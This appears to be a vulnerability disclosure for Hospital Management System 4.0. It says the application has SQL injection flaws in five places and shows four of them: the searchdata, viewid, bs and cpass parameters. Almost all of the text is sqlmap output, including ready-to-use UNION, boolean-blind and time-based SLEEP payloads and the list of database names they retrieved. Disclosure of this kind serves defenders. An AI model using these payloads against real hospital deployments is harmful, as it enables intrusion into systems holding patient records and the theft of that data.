# The Hospital Management System 4.0 web application is vulnerable to
# SQL injection in multiple areas, listed below are 5 of the prominent
# and easy to exploit areas.
?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.
POST parameter 'searchdata' is vulnerable.
sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
---
Parameter: searchdata (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
---
[15:49:58] [INFO] testing MySQL
[15:49:58] [INFO] confirming MySQL
[15:49:58] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.4.1
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[15:49:58] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: viewid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp
[15:54:21] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
Parameter: bs (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=
?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient
---
Parameter: cpass (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
---
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test